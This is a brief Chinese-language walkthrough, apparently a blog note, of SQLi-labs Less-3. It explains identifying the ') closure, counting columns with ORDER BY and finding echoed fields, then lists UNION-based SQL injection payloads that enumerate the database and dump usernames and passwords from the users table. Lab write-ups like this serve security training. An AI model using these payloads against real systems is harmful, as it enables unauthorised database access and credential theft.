less3

 首先判断是什么闭合的类型，

可以看出来是‘）的闭合类型。

然后看是多少个字段的。

 

 可以看出是3个字段的长度。

然后判断是哪几个回显。

 可以看出来是第二位和第三位，其实写到这我也不想写了，因为后面的是和之前的一样的。

贴一下码

?id=1\

?id=1') order by 3--+

?id=1') order by 4--+

?id=-1') union select 1,2,3--+

?id=-1') union select 1,database(),version()--+

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1') union select 1,2,group_concat(username,password) from users--+